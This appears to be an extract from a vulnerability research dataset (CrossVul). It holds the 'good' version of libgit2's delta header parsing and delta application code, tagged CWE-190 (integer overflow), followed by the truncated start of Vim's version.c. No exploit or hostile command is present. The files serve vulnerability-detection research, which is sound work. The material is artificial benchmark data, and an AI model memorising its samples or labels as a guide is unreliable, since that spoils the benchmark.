if (max_size && bufpos > max_size)
break;
buf = git__realloc(buf, bufsize);
if (!buf) {
git__free(tmp);
return -1;
}
}
}
if (inscnt)
buf[bufpos - inscnt - 1] = inscnt;
if (max_size && bufpos > max_size) {
giterr_set(GITERR_NOMEMORY, "delta would be larger than maximum size");
git__free(buf);
return GIT_EBUFS;
}
*out_len = bufpos;
*out = buf;
return 0;
}
/*
* Delta application was heavily cribbed from BinaryDelta.java in JGit, which
* itself was heavily cribbed from <code>patch-delta.c</code> in the
* GIT project. The original delta patching code was written by
* Nicolas Pitre <nico@cam.org>.
*/
static int hdr_sz(
size_t *size,
const unsigned char **delta,
const unsigned char *end)
{
const unsigned char *d = *delta;
size_t r = 0;
unsigned int c, shift = 0;
do {
if (d == end) {
giterr_set(GITERR_INVALID, "truncated delta");
return -1;
}
c = *d++;
r |= (c & 0x7f) << shift;
shift += 7;
} while (c & 0x80);
*delta = d;
*size = r;
return 0;
}
int git_delta_read_header(
size_t *base_out,
size_t *result_out,
const unsigned char *delta,
size_t delta_len)
{
const unsigned char *delta_end = delta + delta_len;
if ((hdr_sz(base_out, &delta, delta_end) < 0) ||
(hdr_sz(result_out, &delta, delta_end) < 0))
return -1;
return 0;
}
#define DELTA_HEADER_BUFFER_LEN 16
int git_delta_read_header_fromstream(
size_t *base_sz, size_t *res_sz, git_packfile_stream *stream)
{
static const size_t buffer_len = DELTA_HEADER_BUFFER_LEN;
unsigned char buffer[DELTA_HEADER_BUFFER_LEN];
const unsigned char *delta, *delta_end;
size_t len;
ssize_t read;
len = read = 0;
while (len < buffer_len) {
read = git_packfile_stream_read(stream, &buffer[len], buffer_len - len);
if (read == 0)
break;
if (read == GIT_EBUFS)
continue;
len += read;
}
delta = buffer;
delta_end = delta + len;
if ((hdr_sz(base_sz, &delta, delta_end) < 0) ||
(hdr_sz(res_sz, &delta, delta_end) < 0))
return -1;
return 0;
}
int git_delta_apply(
void **out,
size_t *out_len,
const unsigned char *base,
size_t base_len,
const unsigned char *delta,
size_t delta_len)
{
const unsigned char *delta_end = delta + delta_len;
size_t base_sz, res_sz, alloc_sz;
unsigned char *res_dp;
*out = NULL;
*out_len = 0;
/*
* Check that the base size matches the data we were given;
* if not we would underflow while accessing data from the
* base object, resulting in data corruption or segfault.
*/
if ((hdr_sz(&base_sz, &delta, delta_end) < 0) || (base_sz != base_len)) {
giterr_set(GITERR_INVALID, "failed to apply delta: base size does not match given data");
return -1;
}
if (hdr_sz(&res_sz, &delta, delta_end) < 0) {
giterr_set(GITERR_INVALID, "failed to apply delta: base size does not match given data");
return -1;
}
GITERR_CHECK_ALLOC_ADD(&alloc_sz, res_sz, 1);
res_dp = git__malloc(alloc_sz);
GITERR_CHECK_ALLOC(res_dp);
res_dp[res_sz] = '\0';
*out = res_dp;
*out_len = res_sz;
while (delta < delta_end) {
unsigned char cmd = *delta++;
if (cmd & 0x80) {
/* cmd is a copy instruction; copy from the base. */
size_t off = 0, len = 0;
if (cmd & 0x01) off = *delta++;
if (cmd & 0x02) off |= *delta++ << 8UL;
if (cmd & 0x04) off |= *delta++ << 16UL;
if (cmd & 0x08) off |= ((unsigned) *delta++ << 24UL);
if (cmd & 0x10) len = *delta++;
if (cmd & 0x20) len |= *delta++ << 8UL;
if (cmd & 0x40) len |= *delta++ << 16UL;
if (!len) len = 0x10000;
if (base_len < off + len || res_sz < len)
goto fail;
memcpy(res_dp, base + off, len);
res_dp += len;
res_sz -= len;
} else if (cmd) {
/*
* cmd is a literal insert instruction; copy from
* the delta stream itself.
*/
if (delta_end - delta < cmd || res_sz < cmd)
goto fail;
memcpy(res_dp, delta, cmd);
delta += cmd;
res_dp += cmd;
res_sz -= cmd;
} else {
/* cmd == 0 is reserved for future encodings. */
goto fail;
}
}
if (delta != delta_end || res_sz)
goto fail;
return 0;
fail:
git__free(*out);
*out = NULL;
*out_len = 0;
giterr_set(GITERR_INVALID, "failed to apply delta");
return -1;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_111_0 |
crossvul-cpp_data_good_3179_1 | /* vi:set ts=8 sts=4 sw=4 noet:
*
* VIM - Vi IMproved by Bram Moolenaar
*
* Do ":help uganda" in Vim to read copying and usage conditions.
* Do ":help credits" in Vim to see a list of people who contributed.
* See README.txt for an overview of the Vim source code.
*/
#include "vim.h"
#ifdef AMIGA
# include <time.h> /* for time() */
#endif
/*
* Vim originated from Stevie version 3.6 (Fish disk 217) by GRWalter (Fred)
* It has been changed beyond recognition since then.
*
* Differences between version 7.4 and 8.x can be found with ":help version8".
* Differences between version 6.4 and 7.x can be found with ":help version7".
* Differences between version 5.8 and 6.x can be found with ":help version6".
* Differences between version 4.x and 5.x can be found with ":help version5".
* Differences between version 3.0 and 4.x can be found with ":help version4".
* All the remarks about older versions have been removed, they are not very
* interesting.
*/
#include "version.h"
char *Version = VIM_VERSION_SHORT;
static char *mediumVersion = VIM_VERSION_MEDIUM;
#if defined(HAVE_DATE_TIME) || defined(PROTO)
# if (defined(VMS) && defined(VAXC)) || defined(PROTO)
char longVersion[sizeof(VIM_VERSION_LONG_DATE) + sizeof(__DATE__)
+ sizeof(__TIME__) + 3];
void
make_version(void)
{
/*
* Construct the long version string. Necessary because
* VAX C can't catenate strings in the preprocessor.
*/
strcpy(longVersion, VIM_VERSION_LONG_DATE);
strcat(longVersion, __DATE__);
strcat(longVersion, " ");
strcat(longVersion, __TIME__);
strcat(longVersion, ")");
}
# else
char *longVersion = VIM_VERSION_LONG_DATE __DATE__ " " __TIME__ ")";
# endif
#else
char *longVersion = VIM_VERSION_LONG;
#endif
static void list_features(void);
static void version_msg(char *s);
static char *(features[]) =
{
#ifdef HAVE_ACL
"+acl",
#else
"-acl",
#endif
#ifdef AMIGA /* only for Amiga systems */
# ifdef FEAT_ARP
"+ARP",
# else
"-ARP",
# endif
#endif
#ifdef FEAT_ARABIC
"+arabic",
#else
"-arabic",
#endif
#ifdef FEAT_AUTOCMD
"+autocmd",
#else
"-autocmd",
#endif
#ifdef FEAT_BEVAL
"+balloon_eval",
#else
"-balloon_eval",
#endif
#ifdef FEAT_BROWSE
"+browse",
#else
"-browse",
#endif
#ifdef NO_BUILTIN_TCAPS
"-builtin_terms",
#endif
#ifdef SOME_BUILTIN_TCAPS
"+builtin_terms",
#endif
#ifdef ALL_BUILTIN_TCAPS
"++builtin_terms",
#endif
#ifdef FEAT_BYTEOFF
"+byte_offset",
#else
"-byte_offset",
#endif
#ifdef FEAT_JOB_CHANNEL
"+channel",
#else
"-channel",
#endif
#ifdef FEAT_CINDENT
"+cindent",
#else
"-cindent",
#endif
#ifdef FEAT_CLIENTSERVER
"+clientserver",
#else
"-clientserver",
#endif
#ifdef FEAT_CLIPBOARD
"+clipboard",
#else
"-clipboard",
#endif
#ifdef FEAT_CMDL_COMPL
"+cmdline_compl",
#else
"-cmdline_compl",
#endif
#ifdef FEAT_CMDHIST
"+cmdline_hist",
#else
"-cmdline_hist",
#endif
#ifdef FEAT_CMDL_INFO
"+cmdline_info",
#else
"-cmdline_info",
#endif
#ifdef FEAT_COMMENTS
"+comments",
#else
"-comments",
#endif
#ifdef FEAT_CONCEAL
"+conceal",
#else
"-conceal",
#endif
#ifdef FEAT_CRYPT
"+cryptv",
#else
"-cryptv",
#endif
#ifdef FEAT_CSCOPE
"+cscope",
#else
"-cscope",
#endif
#ifdef FEAT_CURSORBIND
"+cursorbind",
#else
"-cursorbind",
#endif
#ifdef CURSOR_SHAPE
"+cursorshape",
#else
"-cursorshape",
#endif
#if defined(FEAT_CON_DIALOG) && defined(FEAT_GUI_DIALOG)
"+dialog_con_gui",
#else
# if defined(FEAT_CON_DIALOG)
"+dialog_con",
# else
# if defined(FEAT_GUI_DIALOG)
"+dialog_gui",
# else
"-dialog",
# endif
# endif
#endif
#ifdef FEAT_DIFF
"+diff",
#else
"-diff",
#endif
#ifdef FEAT_DIGRAPHS
"+digraphs",
#else
"-digraphs",
#endif
#ifdef FEAT_GUI_W32
# ifdef FEAT_DIRECTX
"+directx",
# else
"-directx",
# endif
#endif
#ifdef FEAT_DND
"+dnd",
#else
"-dnd",
#endif
#ifdef EBCDIC
"+ebcdic",
#else
"-ebcdic",
#endif
#ifdef FEAT_EMACS_TAGS
"+emacs_tags",
#else
"-emacs_tags",
#endif
#ifdef FEAT_EVAL
"+eval",
#else
"-eval",
#endif
"+ex_extra",
#ifdef FEAT_SEARCH_EXTRA
"+extra_search",
#else
"-extra_search",
#endif
#ifdef FEAT_FKMAP
"+farsi",
#else
"-farsi",
#endif
#ifdef FEAT_SEARCHPATH
"+file_in_path",
#else
"-file_in_path",
#endif
#ifdef FEAT_FIND_ID
"+find_in_path",
#else
"-find_in_path",
#endif
#ifdef FEAT_FLOAT
"+float",
#else
"-float",
#endif
#ifdef FEAT_FOLDING
"+folding",
#else
"-folding",
#endif
#ifdef FEAT_FOOTER
"+footer",
#else
"-footer",
#endif
/* only interesting on Unix systems */
#if !defined(USE_SYSTEM) && defined(UNIX)
"+fork()",
#endif
#ifdef FEAT_GETTEXT
# ifdef DYNAMIC_GETTEXT
"+gettext/dyn",
# else
"+gettext",
# endif
#else
"-gettext",
#endif
#ifdef FEAT_HANGULIN
"+hangul_input",
#else
"-hangul_input",
#endif
#if (defined(HAVE_ICONV_H) && defined(USE_ICONV)) || defined(DYNAMIC_ICONV)
# ifdef DYNAMIC_ICONV
"+iconv/dyn",
# else
"+iconv",
# endif
#else
"-iconv",
#endif
#ifdef FEAT_INS_EXPAND
"+insert_expand",
#else
"-insert_expand",
#endif
#ifdef FEAT_JOB_CHANNEL
"+job",
#else
"-job",
#endif
#ifdef FEAT_JUMPLIST
"+jumplist",
#else
"-jumplist",
#endif
#ifdef FEAT_KEYMAP
"+keymap",
#else
"-keymap",
#endif
#ifdef FEAT_EVAL
"+lambda",
#else
"-lambda",
#endif
#ifdef FEAT_LANGMAP
"+langmap",
#else
"-langmap",
#endif
#ifdef FEAT_LIBCALL
"+libcall",
#else
"-libcall",
#endif
#ifdef FEAT_LINEBREAK
"+linebreak",
#else
"-linebreak",
#endif
#ifdef FEAT_LISP
"+lispindent",
#else
"-lispindent",
#endif
#ifdef FEAT_LISTCMDS
"+listcmds",
#else
"-listcmds",
#endif
#ifdef FEAT_LOCALMAP
"+localmap",
#else
"-localmap",
#endif
#ifdef FEAT_LUA
# ifdef DYNAMIC_LUA
"+lua/dyn",
# else
"+lua",
# endif
#else
"-lua",
#endif
#ifdef FEAT_MENU
"+menu",
#else
"-menu",
#endif
#ifdef FEAT_SESSION
"+mksession",
#else
"-mksession",
#endif
#ifdef FEAT_MODIFY_FNAME
"+modify_fname",
#else
"-modify_fname",
#endif
#ifdef FEAT_MOUSE
"+mouse",
# ifdef FEAT_MOUSESHAPE
"+mouseshape",
# else
"-mouseshape",
# endif
# else
"-mouse",
#endif
#if defined(UNIX) || defined(VMS)
# ifdef FEAT_MOUSE_DEC
"+mouse_dec",
# else
"-mouse_dec",
# endif
# ifdef FEAT_MOUSE_GPM
"+mouse_gpm",
# else
"-mouse_gpm",
# endif
# ifdef FEAT_MOUSE_JSB
"+mouse_jsbterm",
# else
"-mouse_jsbterm",
# endif
# ifdef FEAT_MOUSE_NET
"+mouse_netterm",
# else
"-mouse_netterm",
# endif
#endif
#ifdef __QNX__
# ifdef FEAT_MOUSE_PTERM
"+mouse_pterm",
# else
"-mouse_pterm",
# endif
#endif
#if defined(UNIX) || defined(VMS)
# ifdef FEAT_MOUSE_SGR
"+mouse_sgr",
# else
"-mouse_sgr",
# endif
# ifdef FEAT_SYSMOUSE
"+mouse_sysmouse",
# else
"-mouse_sysmouse",
# endif
# ifdef FEAT_MOUSE_URXVT
"+mouse_urxvt",
# else
"-mouse_urxvt",
# endif
# ifdef FEAT_MOUSE_XTERM
"+mouse_xterm",
# else
"-mouse_xterm",
# endif
#endif
#ifdef FEAT_MBYTE_IME
# ifdef DYNAMIC_IME
"+multi_byte_ime/dyn",
# else
"+multi_byte_ime",
# endif
#else
# ifdef FEAT_MBYTE
"+multi_byte",
# else
"-multi_byte",
# endif
#endif
#ifdef FEAT_MULTI_LANG
"+multi_lang",
#else
"-multi_lang",
#endif
#ifdef FEAT_MZSCHEME
# ifdef DYNAMIC_MZSCHEME
"+mzscheme/dyn",
# else
"+mzscheme",
# endif
#else
"-mzscheme",
#endif
#ifdef FEAT_NETBEANS_INTG
"+netbeans_intg",
#else
"-netbeans_intg",
#endif
#ifdef FEAT_NUM64
"+num64",
#else
"-num64",
#endif
#ifdef FEAT_GUI_W32
# ifdef FEAT_OLE
"+ole",
# else
"-ole",
# endif
#endif
"+packages",
#ifdef FEAT_PATH_EXTRA
"+path_extra",
#else
"-path_extra",
#endif
#ifdef FEAT_PERL
# ifdef DYNAMIC_PERL
"+perl/dyn",
# else
"+perl",
# endif
#else
"-perl",
#endif
#ifdef FEAT_PERSISTENT_UNDO
"+persistent_undo",
#else
"-persistent_undo",
#endif
#ifdef FEAT_PRINTER
# ifdef FEAT_POSTSCRIPT
"+postscript",
# else
"-postscript",
# endif
"+printer",
#else
"-printer",
#endif
#ifdef FEAT_PROFILE
"+profile",
#else
"-profile",
#endif
#ifdef FEAT_PYTHON
# ifdef DYNAMIC_PYTHON
"+python/dyn",
# else
"+python",
# endif
#else
"-python",
#endif
#ifdef FEAT_PYTHON3
# ifdef DYNAMIC_PYTHON3
"+python3/dyn",
# else
"+python3",
# endif
#else
"-python3",
#endif
#ifdef FEAT_QUICKFIX
"+quickfix",
#else
"-quickfix",
#endif
#ifdef FEAT_RELTIME
"+reltime",
#else
"-reltime",
#endif
#ifdef FEAT_RIGHTLEFT
"+rightleft",
#else
"-rightleft",
#endif
#ifdef FEAT_RUBY
# ifdef DYNAMIC_RUBY
"+ruby/dyn",
# else
"+ruby",
# endif
#else
"-ruby",
#endif
#ifdef FEAT_SCROLLBIND
"+scrollbind",
#else
"-scrollbind",
#endif
#ifdef FEAT_SIGNS
"+signs",
#else
"-signs",
#endif
#ifdef FEAT_SMARTINDENT
"+smartindent",
#else
"-smartindent",
#endif
#ifdef STARTUPTIME
"+startuptime",
#else
"-startuptime",
#endif
#ifdef FEAT_STL_OPT
"+statusline",
#else
"-statusline",
#endif
#ifdef FEAT_SUN_WORKSHOP
"+sun_workshop",
#else
"-sun_workshop",
#endif
#ifdef FEAT_SYN_HL
"+syntax",
#else
"-syntax",
#endif
/* only interesting on Unix systems */
#if defined(USE_SYSTEM) && defined(UNIX)
"+system()",
#endif
#ifdef FEAT_TAG_BINS
"+tag_binary",
#else
"-tag_binary",
#endif
#ifdef FEAT_TAG_OLDSTATIC
"+tag_old_static",
#else
"-tag_old_static",
#endif
#ifdef FEAT_TAG_ANYWHITE
"+tag_any_white",
#else
"-tag_any_white",
#endif
#ifdef FEAT_TCL
# ifdef DYNAMIC_TCL
"+tcl/dyn",
# else
"+tcl",
# endif
#else
"-tcl",
#endif
#ifdef FEAT_TERMGUICOLORS
"+termguicolors",
#else
"-termguicolors",
#endif
#if defined(UNIX)
/* only Unix can have terminfo instead of termcap */
# ifdef TERMINFO
"+terminfo",
# else
"-terminfo",
# endif
#else /* unix always includes termcap support */
# ifdef HAVE_TGETENT
"+tgetent",
# else
"-tgetent",
# endif
#endif
#ifdef FEAT_TERMRESPONSE
"+termresponse",
#else
"-termresponse",
#endif
#ifdef FEAT_TEXTOBJ
"+textobjects",
#else
"-textobjects",
#endif
#ifdef FEAT_TIMERS
"+timers",
#else
"-timers",
#endif
#ifdef FEAT_TITLE
"+title",
#else
"-title",
#endif
#ifdef FEAT_TOOLBAR
"+toolbar",
#else
"-toolbar",
#endif
#ifdef FEAT_USR_CMDS
"+user_commands",
#else
"-user_commands",
#endif
#ifdef FEAT_WINDOWS
"+vertsplit",
#else
"-vertsplit",
#endif
#ifdef FEAT_VIRTUALEDIT
"+virtualedit",
#else
"-virtualedit",
#endif
"+visual",
#ifdef FEAT_VISUALEXTRA
"+visualextra",
#else
"-visualextra",
#endif
#ifdef FEAT_VIMINFO
"+viminfo",
#else
"-viminfo",
#endif
#ifdef FEAT_VREPLACE
"+vreplace",
#else
"-vreplace",
#endif
#ifdef FEAT_WILDIGN
"+wildignore",
#else
"-wildignore",
#endif
#ifdef FEAT_WILDMENU
"+wildmenu",
#else
"-wildmenu",
#endif
#ifdef FEAT_WINDOWS
"+windows",
#else
"-windows",
#endif
#ifdef FEAT_WRITEBACKUP
"+writebackup",
#else
"-writebackup",
#endif
#if defined(UNIX) || defined(VMS)
# ifdef FEAT_X11
"+X11",
# else
"-X11",
# endif
#endif
#ifdef FEAT_XFONTSET
"+xfontset",
#else
"-xfontset",
#endif
#ifdef FEAT_XIM
"+xim",
#else
"-xim",
#endif
#ifdef WIN3264
# ifdef FEAT_XPM_W32
"+xpm_w32",
# else
"-xpm_w32",
# endif
#else
# ifdef HAVE_XPM
"+xpm",
# else
"-xpm",
# endif
#endif
#if defined(UNIX) || defined(VMS)
# ifdef USE_XSMP_INTERACT
"+xsmp_interact",
# else
# ifdef USE_XSMP
"+xsmp",
# else
"-xsmp",
# endif
# endif
# ifdef FEAT_XCLIPBOARD
"+xterm_clipboard",
# else
"-xterm_clipboard",
# endif
#endif
#ifdef FEAT_XTERM_SAVE
"+xterm_save",
#else
"-xterm_save",
#endif
NULL
};
static int included_patches[] =
{ /* Add new patch number below this line */
/**/
378,
/**/
377,
/**/
376,
/**/
375,
/**/
374,
/**/
373,
/**/
372,
/**/
371,
/**/
370,
/**/
369,
/**/
368,
/**/
367,
/**/
366,
/**/
365,
/**/
364,
/**/
363,
/**/
362,
/**/
361,
/**/
360,
/**/
359,
/**/
358,
/**/
357,
/**/
356,
/**/
355,
/**/
354,
/**/
353,
/**/
352,
/**/
351,
/**/
350,
/**/
349,
/**/
348,
/**/
347,
/**/
346,
/**/
345,
/**/
344,
/**/
343,
/**/
342,
/**/
341,
/**/
340,
/**/
339,
/**/
338,
/**/
337,
/**/
336,
/**/
335,
/**/
334,
/**/
333,
/**/
332,
/**/
331,
/**/
330,
/**/
329,
/**/
328,
/**/
327,
/**/
326,
/**/
325,
/**/
324,
/**/
323,
/**/
322,
/**/
321,
/**/
320,
/**/
319,
/**/
318,
/**/
317,
/**/
316,
/**/
315,
/**/
314,
/**/
313,
/**/
312,
/**/
311,
/**/
310,
/**/
309,
/**/
308,
/**/
307,
/**/
306,
/**/
305,
/**/
304,
/**/
303,
/**/
302,
/**/
301,
/**/
300,
/**/
299,
/**/
298,
/**/
297,
/**/
296,
/**/
295,
/**/
294,
/**/
293,
/**/
292,
/**/
291,
/**/
290,
/**/
289,
/**/
288,
/**/
287,
/**/
286,
/**/
285,
/**/
284,
/**/
283,
/**/
282,
/**/
281,
/**/
280,
/**/
279,
/**/
278,
/**/
277,
/**/
276,
/**/
275,
/**/
274,
/**/
273,
/**/
272,
/**/
271,
/**/
270,
/**/
269,
/**/
268,
/**/
267,
/**/
266,
/**/
265,
/**/
264,
/**/
263,
/**/
262,
/**/
261,
/**/
260,
/**/
259,
/**/
258,
/**/
257,
/**/
256,
/**/
255,
/**/
254,
/**/
253,
/**/
252,
/**/
251,
/**/
250,
/**/
249,
/**/
248,
/**/
247,
/**/
246,
/**/
245,
/**/
244,
/**/
243,
/**/
242,
/**/
241,
/**/
240,
/**/
239,
/**/
238,
/**/
237,
/**/
236,
/**/
235,
/**/
234,
/**/
233,
/**/
232,
/**/
231,
/**/
230,
/**/
229,
/**/
228,
/**/
227,
/**/
226,
/**/
225,
/**/
224,
/**/
223,
/**/
222,
/**/
221,
/**/
220,
/**/
219,
/**/
218,
/**/
217,
/**/
216,
/**/
215,
/**/
214,
/**/
213,
/**/
212,
/**/
211,
/**/
210,
/**/
209,
/**/
208,
/**/
207,
/**/
206,
/**/
205,
/**/
204,
/**/
203,
/**/
202,
/**/
201,
/**/
200,
/**/
199,
/**/
198,
/**/
197,
/**/
196,
/**/
195,
/**/
194,
/**/
193,
/**/
192,
/**/
191,
/**/
190,
/**/
189,
/**/
188,
/**/
187,
/**/
186,
/**/
185,
/**/
184,
/**/
183,
/**/
182,
/**/
181,
/**/
180,
/**/
179,
/**/
178,
/**/
177,
/**/
176,
/**/
175,
/**/
174,
/**/
173,
/**/
172,
/**/
171,
/**/
170,
/**/
169,
/**/
168,
/**/
167,
/**/
166,
/**/
165,
/**/
164,
/**/
163,
/**/
162,
/**/
161,
/**/
160,
/**/
159,
/**/
158,
/**/
157,
/**/
156,
/**/
155,
/**/
154,
/**/
153,
/**/
152,
/**/
151,
/**/
150,
/**/
149,
/**/
148,
/**/
147,
/**/
146,
/**/
145,
/**/
144,
/**/
143,
/**/
142,
/**/
141,
/**/
140,
/**/
139,
/**/
138,
/**/
137,
/**/
136,
/**/
135,
/**/
134,
/**/
133,
/**/
132,
/**/
131,
/**/
130,
/**/
129,
/**/
128,
/**/
127,
/**/
126,
/**/
125,
/**/
124,
/**/
123,
/**/
122,
/**/
121,
/**/
120,
/**/
119,
/**/
118,
/**/
117,
/**/
116,
/**/
115,
/**/
114,
/**/
113,
/**/
112,
/**/
111,
/**/
110,
/**/
109,
/**/
108,
/**/
107,
/**/
106,
/**/
105,
/**/
104,
/**/
103,
/**/
102,
/**/
101,
/**/
100,
/**/
99,
/**/
98,
/**/
97,
/**/
96,
/**/
95,
/**/
94,
/**/
93,
/**/
92,
/**/
91,
/**/
90,
/**/
89,
/**/
88,
/**/
87,
/**/
86,
/**/
85,
/**/
84,
/**/
83,
/**/
82,
/**/
81,
/**/
80,
/**/
79,
/**/
78,
/**/
77,
/**/
76,
/**/
75,
/**/
74,
/**/
73,
/**/
72,
/**/
71,
/**/
70,
/**/
69,
/**/
68,
/**/
67,
/**/
66,
/**/
65,
/**/
64,
/**/
63,
/**/
62,
/**/
61,
/**/
60,
/**/
59,
/**/
58,
/**/
57,
/**/
56,
/**/
55,
/**/
54,
/**/
53,
/**/
52,
/**/
51,
/**/
50,
/**/
49,
/**/
48,
/**/
47,
/**/
46,
/**/
45,
/**/
44,
/**/
43,
/**/
42,
/**/
41,
/**/
40,
/**/
39,
/**/
38,
/**/
37,
/**/
36,
/**/
35,
/**/
34,
/**/
33,
/**/
32,
/**/
31,
/**/
30,
/**/
29,
/**/
28,
/**/
27,
/**/
26,
/**/
25,
/**/
24,
/**/
23,
/**/
22,
/**/
21,
/**/
20,
/**/
19,
/**/
18,
/**/
17,
/**/
16,
/**/
15,
/**/
14,
/**/
13,
/**/
12,
/**/
11,
/**/
10,
/**/
9,
/**/
8,
/**/
7,
/**/
6,
/**/
5,
/**/
4,
/**/
3,
/**/
2,
/**/
1,
/**/
0
};
/*
* Place to put a short description when adding a feature with a patch.
* Keep it short, e.g.,: "relative numbers", "persistent undo".
* Also add a comment marker to separate the lines.
* See the official Vim patches for the diff format: It must use a context of
* one line only. Create it by hand or use "diff -C2" and edit the patch.
*/
static char *(extra_patches[]) =
{ /* Add your patch description below this line */
/**/
NULL
};
int
highest_patch(void)
{
int i;
int h = 0;
for (i = 0; included_patches[i] != 0; ++i)
if (included_patches[i] > h)
h = included_patches[i];
return h;
}
#if defined(FEAT_EVAL) || defined(PROTO)
/*
* Return TRUE if patch "n" has been included.
*/
int
has_patch(int n)
{
int i;
for (i = 0; included_patches[i] != 0; ++i)
if (included_patches[i] == n)
return TRUE;
return FALSE;
}
#endif
void
ex_version(exarg_T *eap)
{
/*
* Ignore a ":version 9.99" command.
*/
if (*eap->arg == NUL)
{
msg_putchar('\n');
list_version();
}
}
/*
* List all features aligned in columns, dictionary style.
*/
static void
list_features(void)
{
int i;
int ncol;
int nrow;
int nfeat = 0;
int width = 0;
/* Find the length of the longest feature name, use that + 1 as the column
* width */
for (i = 0; features[i] != NULL; ++i)
{
int l = (int)STRLEN(features[i]);
if (l > width)
width = l;
++nfeat;
}
width += 1;
if (Columns < width)
{
/* Not enough screen columns - show one per line */
for (i = 0; features[i] != NULL; ++i)
{
version_msg(features[i]);
if (msg_col > 0)
msg_putchar('\n');
}
return;
}
/* The rightmost column doesn't need a separator.
* Sacrifice it to fit in one more column if possible. */
ncol = (int) (Columns + 1) / width;
nrow = nfeat / ncol + (nfeat % ncol ? 1 : 0);
/* i counts columns then rows. idx counts rows then columns. */
for (i = 0; !got_int && i < nrow * ncol; ++i)
{
int idx = (i / ncol) + (i % ncol) * nrow;
if (idx < nfeat)
{
int last_col = (i + 1) % ncol == 0;
msg_puts((char_u *)features[idx]);
if (last_col)
{
if (msg_col > 0)
msg_putchar('\n');
}
else
{
while (msg_col % width)
msg_putchar(' ');
}
}
else
{
if (msg_col > 0)
msg_putchar('\n');
}
}
}
void
list_version(void)
{
int i;
int first;
char *s = "";
/*
* When adding features here, don't forget to update the list of
* internal variables in eval.c!
*/
MSG(longVersion);
#ifdef WIN3264
# ifdef FEAT_GUI_W32
# ifdef _WIN64
MSG_PUTS(_("\nMS-Windows 64-bit GUI version"));
# else
MSG_PUTS(_("\nMS-Windows 32-bit GUI version"));
# endif
# ifdef FEAT_OLE
MSG_PUTS(_(" with OLE support"));
# endif
# else
# ifdef _WIN64
MSG_PUTS(_("\nMS-Windows 64-bit console version"));
# else
MSG_PUTS(_("\nMS-Windows 32-bit console version"));
# endif
# endif
#endif
#ifdef MACOS
# ifdef MACOS_X
# ifdef MACOS_X_UNIX
MSG_PUTS(_("\nMacOS X (unix) version"));
# else
MSG_PUTS(_("\nMacOS X version"));
# endif
#else
MSG_PUTS(_("\nMacOS version"));
# endif
#endif
#ifdef VMS
MSG_PUTS(_("\nOpenVMS version"));
# ifdef HAVE_PATHDEF
if (*compiled_arch != NUL)
{
MSG_PUTS(" - ");
MSG_PUTS(compiled_arch);
}
# endif
#endif
/* Print the list of patch numbers if there is at least one. */
/* Print a range when patches are consecutive: "1-10, 12, 15-40, 42-45" */
if (included_patches[0] != 0)
{
MSG_PUTS(_("\nIncluded patches: "));
first = -1;
/* find last one */
for (i = 0; included_patches[i] != 0; ++i)
;
while (--i >= 0)
{
if (first < 0)
first = included_patches[i];
if (i == 0 || included_patches[i - 1] != included_patches[i] + 1)
{
MSG_PUTS(s);
s = ", ";
msg_outnum((long)first);
if (first != included_patches[i])
{
MSG_PUTS("-");
msg_outnum((long)included_patches[i]);
}
first = -1;
}
}
}
/* Print the list of extra patch descriptions if there is at least one. */
if (extra_patches[0] != NULL)
{
MSG_PUTS(_("\nExtra patches: "));
s = "";
for (i = 0; extra_patches[i] != NULL; ++i)
{
MSG_PUTS(s);
s = ", ";
MSG_PUTS(extra_patches[i]);
}
}
#ifdef MODIFIED_BY
MSG_PUTS("\n");
MSG_PUTS(_("Modified by "));
MSG_PUTS(MODIFIED_BY);
#endif
#ifdef HAVE_PATHDEF
if (*compiled_user != NUL || *compiled_sys != NUL)
{
MSG_PUTS(_("\nCompiled "));
if (*compiled_user != NUL)
{
MSG_PUTS(_("by "));
MSG_PUTS(compiled_user);
}
if (*compiled_sys != NUL)
{
MSG_PUTS("@");
MSG_PUTS(compiled_sys);
}
}
#endif
#ifdef FEAT_HUGE
MSG_PUTS(_("\nHuge version "));
#else
# ifdef FEAT_BIG
MSG_PUTS(_("\nBig version "));
# else
# ifdef FEAT_NORMAL
MSG_PUTS(_("\nNormal version "));
# else
# ifdef FEAT_SMALL
MSG_PUTS(_("\nSmall version "));
# else
MSG_PUTS(_("\nTiny version "));
# endif
# endif
# endif
#endif
#ifndef FEAT_GUI
MSG_PUTS(_("without GUI."));
#else
# ifdef FEAT_GUI_GTK
# ifdef USE_GTK3
MSG_PUTS(_("with GTK3 GUI."));
# else
# ifdef FEAT_GUI_GNOME
MSG_PUTS(_("with GTK2-GNOME GUI."));
# else
MSG_PUTS(_("with GTK2 GUI."));
# endif
# endif
# else
# ifdef FEAT_GUI_MOTIF
MSG_PUTS(_("with X11-Motif GUI."));
# else
# ifdef FEAT_GUI_ATHENA
# ifdef FEAT_GUI_NEXTAW
MSG_PUTS(_("with X11-neXtaw GUI."));
# else
MSG_PUTS(_("with X11-Athena GUI."));
# endif
# else
# ifdef FEAT_GUI_PHOTON
MSG_PUTS(_("with Photon GUI."));
# else
# if defined(MSWIN)
MSG_PUTS(_("with GUI."));
# else
# if defined(TARGET_API_MAC_CARBON) && TARGET_API_MAC_CARBON
MSG_PUTS(_("with Carbon GUI."));
# else
# if defined(TARGET_API_MAC_OSX) && TARGET_API_MAC_OSX
MSG_PUTS(_("with Cocoa GUI."));
# else
# if defined(MACOS)
MSG_PUTS(_("with (classic) GUI."));
# endif
# endif
# endif
# endif
# endif
# endif
# endif
# endif
#endif
version_msg(_(" Features included (+) or not (-):\n"));
list_features();
#ifdef SYS_VIMRC_FILE
version_msg(_(" system vimrc file: \""));
version_msg(SYS_VIMRC_FILE);
version_msg("\"\n");
#endif
#ifdef USR_VIMRC_FILE
version_msg(_(" user vimrc file: \""));
version_msg(USR_VIMRC_FILE);
version_msg("\"\n");
#endif
#ifdef USR_VIMRC_FILE2
version_msg(_(" 2nd user vimrc file: \""));
version_msg(USR_VIMRC_FILE2);
version_msg("\"\n");
#endif
#ifdef USR_VIMRC_FILE3
version_msg(_(" 3rd user vimrc file: \""));
version_msg(USR_VIMRC_FILE3);
version_msg("\"\n");
#endif
#ifdef USR_EXRC_FILE
version_msg(_(" user exrc file: \""));
version_msg(USR_EXRC_FILE);
version_msg("\"\n");
#endif
#ifdef USR_EXRC_FILE2
version_msg(_(" 2nd user exrc file: \""));
version_msg(USR_EXRC_FILE2);
version_msg("\"\n");
#endif
#ifdef FEAT_GUI
# ifdef SYS_GVIMRC_FILE
version_msg(_(" system gvimrc file: \""));
version_msg(SYS_GVIMRC_FILE);
version_msg("\"\n");
# endif
version_msg(_(" user gvimrc file: \""));
version_msg(USR_GVIMRC_FILE);
version_msg("\"\n");
